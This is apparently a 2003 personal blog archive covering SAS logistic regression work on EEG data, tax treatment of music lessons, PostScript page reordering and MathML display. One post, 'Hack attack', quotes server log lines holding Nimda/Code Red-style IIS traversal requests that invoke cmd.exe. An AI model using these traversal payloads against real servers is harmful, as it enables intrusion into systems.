April 30, 2003

Capital Markets Global Services

Who are these guys? Their two domains, capmktsgs.com and emarketsgs.com. Their earliest post on newsgroups was in July, 1998.

Reference USA gives the following info:


Name: CAPITAL MARKETS GLOBAL SVC Employees: Corporate Location 5 to 9
Address: 244 MADISON AVE # 339 Est Sales: $500,000 to $1 MILLION
City: NEW YORK, NY 10016-2817 Location: SINGLE LOC
Contact: MORGAN DENNY (OWNER) Credit Rating Code*: GOOD
County: NEW YORK ABI Number: 560918856
MSA: NEW YORK, NY Public: No
Phone: (212) 797-1298 Ticker Symbol: Not Applicable
Fax**: Toll Free Number: Not Applicable
Fortune 1000 Ranking: Not Applicable URL: Not Applicable
Foreign Parent: NO

SIC: 7361-05, EXECUTIVE SEARCH CONSULTANTS
NAICS: 54161204, HUMAN RESOURCES/EXEC SEARCH CNSLTNG SVCS


In addition, after an inquiry, I got a response from Mr. Denny stating that Capital markets is "a 7-year old retained and contingency Executive Search and Placement firm, based in mid-town Manhattan." And that he and his 4 partners have "over 125 years of collective experience in consulting, financial services and executive search, coming from the financial services industries and firms serving these industries." Interesting.

Posted by torque at 10:38 AM | Comments (2)

April 15, 2003

Wireless data

I need to transfer 8 channels x 32x200 bps = 51200 bps continuously. A buffer may be necessary - hopefully not. Based on some earlier work, it seems that life would be simplest if we used something like the TR1000 from RF Monolithics. The sales person suggested the DR2000, which packetizes the data and does some error correction. A microcontroller will be used to take data from 8 ADCs, multiplex them, and transmit them. We may be able to use some Atmel facilities on campus.

Posted by torque at 3:57 PM | Comments (0)

April 12, 2003

Music lessons and the IRS

Given our proximity to April 15, it is only appropriate to have a tax related blog. So... suppose you are interested in giving music lessons, and you give a number of piano lessons. Certainly, some amount of tax is owed to the government, but how does it work?

Business or hobby. Regardless of profitability, the IRS distinguishes between businesses and hobbies. If your activities are classified as being a hobby, all your expenses may not be deductible. A hobby is an activity that is not engaged for profit. However, you can still lose money and be classified as a business, albeit a lousy one. But in order to show that you are a business, you must carry on your activity in a "business-like" manner, i.e., separate checking accounts, good records, etc. For a few lessons, is the distinction critical? Assume for the moment, that our activity is a business using the market rate claim.

Expensability. The IRS has a document on deducting business expenses. Here hobbies are defined as a "not-for-profit activity". In this case, the limitation on expense deduction is the gross income from the actities (see the example on page 5 regarding Ida). This is reasonable. Imagine that you like to build R/C helicopters, and you sell these to your friends at cost. The IRS would expect to receive something from the transaction, however, since you sell it at cost, you really aren't making anything, so you shouldn't have to pay any taxes. If you sell it to your friends at less then cost, you shouldn't be able to go back and try to reduce the tax liability for the rest of your earnings by claiming the deduction. (However, if you are self-employed, and R/C helicopters is your living, you should be always trying to make a profit, in which case, if you do have a loss, you reduce your total earnings since this is part of what you are trying to do for survival.)

So, what about our piano lessons. As long as the market rate is charged, it seems like it should be counted as a business. If the rate is heavily discounted, that may be more questionable. The problem with lessons is that the cost of material is not so easily computed. What goes into piano lessons:


  • Experience, previous training
  • Materials - books, etc.
  • Piano - depreciation (if using one's own piano)
  • Rent, real estate expenses (if using one's own studio)
  • Travel expenses (if using client's home, piano)
  • Professional organization membership fees

How to quantify these things is no so clear. Take the piano. Suppose it was given to you as a gift. How do you then use it as a business asset? Would you depreciate a percentage to piano? Could you as a person, rent piano time at market rate to you as the business person? Would you then pay tax on the rent and then depreciate the piano?

Posted by torque at 11:41 AM | Comments (0)

April 10, 2003

Reorder postscript pages

Reordering postscript pages in unix is very straight-forward. There are a number of perl utilities out there but there is actually one that is probably in your system already. It's called psselect. psselect is part of PSUtils. To use it:


psselect -p

I needed to do what is known as a flipstack. On double-sided printing, the tops should be 1,2,3,... and when you get to the end of the stack, you flip it over, and go all the way to the end. I had 16 pages, so I simply wrote:

psselect -p1,16,2,15,3,14,...,8,9 in.ps out.ps

Amazingly it worked. I found the solution at google groups.

Posted by torque at 12:30 PM | Comments (1)

Line numbers

I wanted to have line numbers on the side of my Word document. But how? Thanks to google, I found it at TechTV.

Posted by torque at 1:30 AM | Comments (0)

April 9, 2003

Stepwise Logistic Regression

After talking with Pat yesterday it seemed that I was missing the boat on a fundamental technique: stepwise selection. I found a good SAS tutorial at ncsu. In stepwise selection, an attempt is made to remove insignificant variables. The way I had been doing (though more manually) is also mentioned in the text and implemented by using SELECTION=BACKWARD instead of SELECTION=STEPWISE. The idea here is to eject variables below a certain significance level.

To run stepwise logistic regression, we specify entry significance level (SLENTRY=0.#) and staying significance level (SLSTAY=0.#). LACKFIT tests Lack of Fit.

title 'Stepwise logistic regression on class 1 versus class 7';
proc logistic data = A outest=params;
model var16=var1-var15 / selection=stepwise slentry=0.3 slstay=0.35 lackfit;
run;

Posted by torque at 1:10 PM | Comments (2)

Hack attack

My home PC has been attacked. I figured out that it was either Nimda or Code Red.

cmpt-100.usask.ca - - [28/Mar/2003:13:02:27 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294
cmpt-100.usask.ca - - [28/Mar/2003:13:02:27 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316

Posted by torque at 9:01 AM | Comments (5)

April 8, 2003

The tale of two datasets

I took S6A_c37 (C2P from S6A) and randomly split it into two sets, A and B. I then ran PROC CATMOD on each using the algorithm I discussed earlier - discarding redundant variables. Hmm... never mind, mabye this doesn't work. There was no match at all - in fact, even after cutting the p values for parameters on A were still bad. It may well be that CATMOD is the wrong tool for trying to do this.

As I suspected, the trouble comes from the large number of variables I'm using. I found a useful thread on Google groups discussing sample size. Essentially the posters suggest >10 events per independent variable, we are way off from there though, events being the minimum number of trials of each class. This would suggest that we need >10x61x7 = 4270, which we certainly don't have. (Though we might have it in the case of the math...). The only recourse is to take down the number of variables. Since we have ~100 of each class, we want <10 variables. Ouch.

Posted by torque at 3:00 AM | Comments (0)

SAS binning

I'd like to be able to randomize and split the dataset so that I can do the so-called 10-fold cross validation. How can I do this in SAS? I found some helpful hints on Marilyn Collins' website. The first step is the command SET which allows you to build a new dataset off of an existing dataset. You can, for instance, only choose triggers values greater than 4, e.g., 5, 6, and 7, using:


DATA temp;
SET classify.s6a_c37;
IF var62>4;
RUN;

This posting by David Ward puts us even closer. Aha, but I struck gold at University of Texas at Austin Statistical Services...

Randomly selecting an approximate proportion


DATA analysis holdout;
SET alldata;
IF RANUNI(0) < = 2/3 OUTPUT analysis;
ELSE OUTPUT holdout;
RUN;

Randomly selecting an exact proportion

DATA analysis holdout;
SET alldata;
RETAIN k 67 n 100;
IF RANUNI(358798) < = k/n THEN DO;
k = k-1;
OUTPUT analysis;
END;
ELSE OUTPUT holdout;
n = n-1;
DROP k n;
RUN;

The later is what I want. The webpage is pretty cool though, it also has code for doing fancy resampling techniques such as Jackknife, Split-Sample, and Bootstrap.

Posted by torque at 1:50 AM | Comments (0)

April 7, 2003

Observation-based logistic regression

After some discussion with Pat, I decided to attempt to run logisitic regression using downsampled observations as the input variables. For each channel there are 61 points, so in total, we have 61x60=3660, far too many points! After a failed attempted at loading the file into SAS, I chose one channel from S6A, C2P (the best monopolar channel using least square).

Data. The dataset consists of S6's responses to seven words presented aurally. As mentioned earlier, channel 37, C2P, was selected via earlier results using our traditional method. EEG recordings using Neuroscan were recorded in continous mode (.cnt) was filtered at 25 Hz and downsampled to 50 Hz. For each trial, the start point was -200 ms from the stimulus trigger, and the end point was 1000 ms from the same trigger. Data were then converted into a comma-delimited format and imported into SAS.

Procedure. I used the CATMOD procedure in SAS. Among other things, this procedure allows one to run nominal logistic regression. I used the following script:


PROC CATMOD DATA=classify.s6a_c37;
RESPONSE logits;
DIRECT var1-var61;
MODEL var62=var1-var61 / noprofile;
RUN;

There are several important items to note. CATMOD by default categorizes the variables. In this case, our variables are continous, so we must use the command DIRECT. There are a total of 61 observations per trial, var1-var61. The final column, var62, is the class of the trial (1-7).

Results and analysis. The results are difficult to interpret! The format leaves room for improvement... the table to start out occurs halfway through the file and is entitled "Maximum Likelihood Analysis of Variance". The trouble with a multinomial analysis is deciding what variables to throw out. Here's what I did. I looked at the analysis of variance and removed from my model variables which were considered "redundant" by the system. I then re-ran CATMOD. I kept doing this until there were no more "redundant" variables (there is an '*' by in the df column). Then, I took out variables which had p=values which were much larger than the smallest (>0.025). After five iterations, I was left with this: var29, var37, var44. The confusing news is that the likelihood ratio is 1.0. What does this mean? I think it means we have a perfect fit - which may have occurred just because I threw out all the other observations that didn't help. The way to evaluate this is to somehow test it on test data - OR - run the model-making algorithm on two sets of data and see how the results compare. If we end up with the same observation numbers, that is awesome news. Most likely they will be completely different.

Other stuff. Oh, I figured out how to output to HTML using ODS. I regenerated the 'fifth cut' nesting the MODEL command:

ods html body='WWW/tuning/saslogs/test.html';
MODEL var62=var29 var37 var44 / noprofile;
title2 'Fifth cut';
run;
ods html close;

Posted by torque at 9:50 PM | Comments (0)

Fast Robust Logistic Regression

I found an article today from Carnegie Mellon entitled Fast Robust Logistic Regression for Large Sparse Datasets with Binary Outputs. Paul Kornarek and Andrew Moore from the Autolab compared logistic regression with a number of other classification tools (like Support Vector Machine) and found little difference in performance, contrary to popular belief. Of particular interest to me was their data set and methodology. The data set consisted of life sciences data of up to a million attributes. This is interesting because I was considering doing the same with EEG data but concerned with overfitting.

Data. The authors used two sets of data, ds1 and ds2. ds1 consists of ~6,000 binary-attributes and 27,000 rows, and ds2 ~1,000,000 binary-valued attributes and 90,000 rows. The interesting thing about the latter is that the number of attributes exceeds the number of rows. There are caveats however. Unlike our attributes (the waveform, and potentially the spectrum), ds1 and ds2 are sparse, meaning that there are few non-zero attributes. In fact, they basically end up showing reducing the data down to 10 and 100 attributes using Principle Component Analysis (PCA) give similar results to using the full set of data.

In our case the attributes are continuous, and, dense. ds1 and ds2 are life sciences data. I suspect that they must encode the presence of certain genes, hence the binary attributes. ds1 has a sparcity factor F = 0.0220 while ds2 has a sparcity factor of F=0.0003. Assuming that the non-zero's are even distributed (which they shouldn't be), we would arrive 132 non-zero elements/row for ds1 and 300 elements/row for ds2. What I will probably try next is to do classification based on logistic regression by channel, and compare channel results. After that, we can see if combining channels (basically putting together the waveforms) can make any difference.

Analysis. Two things were interesting in the paper. To compare results, they used 10-fold cross validation. I should do this on my results as well. They also use an interesting plot called a Receiver Operating Characteristic (ROC) curve. To construct this curve, the dataset rows are first sorted in order of decreasing probability. Then, starting from the graph origin, the rows are stepped through moving one unit up if the row is positive and right otherwise. On a dataset of P positive and R-P negative rows, a perfect lerner starts at the origin, goes up to (0,P) and then goes straight to (R-P,P). A random guesser moves from (0,P) direct to (R-P,P).

The success of the learning is measured by the area under the [ROC] curve (AUC). A perfect learner has an AUC of 1.0 while a random guesser has an AUC of 0.5. The data as partitioned 10 times (10 fold) to calculate the standard deviation of the AUC. The same 10 partitions are used to compare various algorithms, and comparisons are made pairwise using the same partition.

Posted by torque at 11:03 AM | Comments (2)

April 6, 2003

PCVideoOnline.com

Looking at laptops, I stumbled upon a company called PCVideoOnline which seemed to have an unbelieveable pricing. I'll let the reviews speak for themselves. They are very extreme either 1's or 5's, which makes it quite... err... interesting.

OSDN Pricegrabber
Epinions
Bizrate

Sure enough, the laptop turned out to be a "Class A Refurbished" with 90-day warranty. Now, this may not be bad, since many times people return laptops within 30 days. These turn into "refurbished". Still, it would seem more honest if they just said it up front on site, instead of advertising it as if it was new. Also, there is additional 4% "insurance" charge.

Posted by torque at 5:07 PM | Comments (8)

April 4, 2003

Ordinal versus Nominal

On an earlier post, I described my first (rather weak) attempt at logistic regression. It failed because I did not structure the problem properly. I was trying to see which channels contributed best to recognition using each channel's classification rate. Of course, this is exactly what the algorithm gives back. In order to use logisitic regression in our prolbem, we need to use it to give back not the classification rate of each channel, but the probability that the trial is a particular class given the results of each channel. I've italicized results because we can either look at the output of our least squares or correlation coefficient classification, or, we can look at a more basic level at the waveforms themselves. I will start with the former. Besides binary responses, logisitic regression can be used to classify both nominal and ordinal responses. Nominal responses are unordered, e.g., French, Italian, or Thousand Island. Ordinal responses are ordered, e.g., no pain, slightly painful, or really painful. In our particular application the classification classes are nominal. This type of analysis is known as nomial, multinomial or polytomous logisitic regression.

In SAS, PROC LOGISTIC is used for ordinal logistic regression while PROC CATMOD is used for nominal logistic regression. I will be using the latter. Fortunately, SAS gives some examples on how to use this in command line mode. An even better tutorial can be found at Queens. Unfortunately, I could discern no way of using this command using Analyst. Incidentally, I found a quick reference on file handling in SAS. Be careful not to erase your file. The DIRECT keyword should not be used, as it specifies that the data should be treated as quantitative rather than qualititive. In this case the classification gives the class which is qualititative.

The data should be formatted like so:


Ch1Ch2Ch3Ch4Ch5Truth
154356

where the numbers under Ch# indicate the class each channel classifies the trial as. Remember the goal is to derive the appropriate weighting for channel results.

Posted by torque at 9:33 AM | Comments (0)

April 3, 2003

MathPlayer

I realized that I needed a good way of displaying equations. Rather than going the graphical route, I decided to try MathML. If you are using Internet Explorer, you will need either IBM Techexplorer ($27, 30-day trial) or Design Science MathPlayer (free... at the moment). Design Science are the same people who make MathType and Equation Editor in Microsoft Word - so I doubt it will remain free long. I've included a link to MathPlayer on the right hand column under "Tools". Incidentally, if you are using the latest version of Netscape, Amaya or Mozilla you don't have to download anything. For more details click here. Unfortunately, it's still not quite working perfectly on this blog, as it is designed to be in XML not XHTML. It does work for IE users with MathPlayer installed though.

MathPlayer. If you are willing to lock your users to using IE6 and MathPlayer, you can following the instructions at Design Science. This is obviously not ideal, but I had a hard time getting anything else to work though MovableType does use XHTML. The problem with this setup is that MoveableType inserts a "br" each time you press enter. This totally mixes up the MathML and messes up the equation. To get it to work, you must have no carriage returns anywhere between m:math and /m:math.

This is a MathPlayer test:
x 2 + 9 x + 9 = 0

Generalization. There must be a way to make it so that we don't have to lock ourselves into using MathPlayer, however, the way is not yet evident. I found some tips on parsing MathML at the w3.org website that don't work. I can write xml that will work but in xhtml we may well need to declare the MathPlayer object. If you are using Linux, this page probably even gave you an error!

Posted by torque at 2:09 PM | Comments (6)

Logits and Classification

How to structure the problem is a big issue. Usually logisitic regression is used in situations where the potential factors are quite clear. For instance, weight, sex, family history as they relate to a disease like heart disease. In our case, it is not so evident what the factors to use in the model are. We could, for instance, use logistic regression as a sort of bootstrap for our existing classification scheme. We can determine how each channel contributes to correct classification and create a weight. Or, we could start at a more basic level and let each observation point be a factor to be analyzed. A consideration in the latter case is the great potential for overfitting.

Potential methods. In the current implementation, we are able to obtain, for each training trial, N channels of match or no match. We have this for each grid point. We can go further, by considering the class that each channel matches too (1 through 7). The next level would be to examine the least squares or correlation coefficient to each class. Finally, we can discard our measure all together and use each observation point (or Fourier component) as a factor in our analysis. Note: From now on I will only consider data downsampled using Marcos' (traditional) method so that there is no controversy regarding the base data.

Match - first cut. In the "match" analysis, rather than simply using results of the best channel, we can consider all other channels. But how can we weight the significance of other channels? We can do it with logistic regression. In this case, the response is binary - either 1 or 0, does match or does not match. The dependent variables are the results for each channel, either 1 or 0. In VA monopolar data there are 60 channels. However, in the bipolar data there are 1770 channels - clearly a recipe for overfitting. We can reduce the data set by considering only the best m channels, or, we can run all of them and take out channels that seem irrelevant after we do the logisitic regression.

To build the model, we would something like:


channeltraintotal
Cz43193
Fz12193
Pz54193
C422193

But does this really help us? I tried running this dummy data set suing SAS: Analysis and got the following results (under "Analysis of Maximum Likelihood"):

parameterDFestimatestd err
intercept1-1.73980.1106
C41-0.31080.1946
Cz10.49030.1649
Fz1-0.97380.2380

What does this mean? Now I'm thinking that I thought about this wrong. I found some notes on deciphering SAS output. I feel like somewhere along the line I needed to tell SAS that I was supposed to get 193/193, but I haven't done that... Basically, the analysis is says that the log of the odds is given by

g = -1.7398 - (0.3108 x <1>) + (0.4903 x <2>) - (0.9738 x <3>)

This is probably not what I wanted. The translation table for the channels is given by:

123
C4100
Cz010
Fz001
Pz-1-1-1

So, in fact, what we have calculated here is what the expected odds of classifying using any given channel. This does not mix the channels like I wanted. Let's see how well it worked. Suppose my channel is Pz. Then

g_Pz = -1.7398 + 0.3108 - 0.4903 + 0.9738 = -0.9455

p/(1-p) = e^-0.9455 = 0.3885

p = 0.3855/1.3855 = .2782

Of course, this is right where we started, since

.2782 x 193 = 53.7

So, we are still not thinking about this correctly. Though it is nice to see that the results are not to wierd.

Posted by torque at 10:25 AM | Comments (2)

April 2, 2003

SAS and Logistic Regression

I've been playing around with logistic regression on SAS. In case you should happen to need to do the same, here are a few useful things. First of all, as it helps to have a GUI, get VNC installed and running. This will let you run X-windows on a PC. I was fortunate to find some helpful scripts from Chaiyasit Manovit, who incidentally rocks. Unfortunately I had problems saving file templates but still did not have too bad of a time importing my data. A good place to start is the Analyst (under Solutions->Analysis->Analyst).

Posted by torque at 3:54 PM | Comments (1)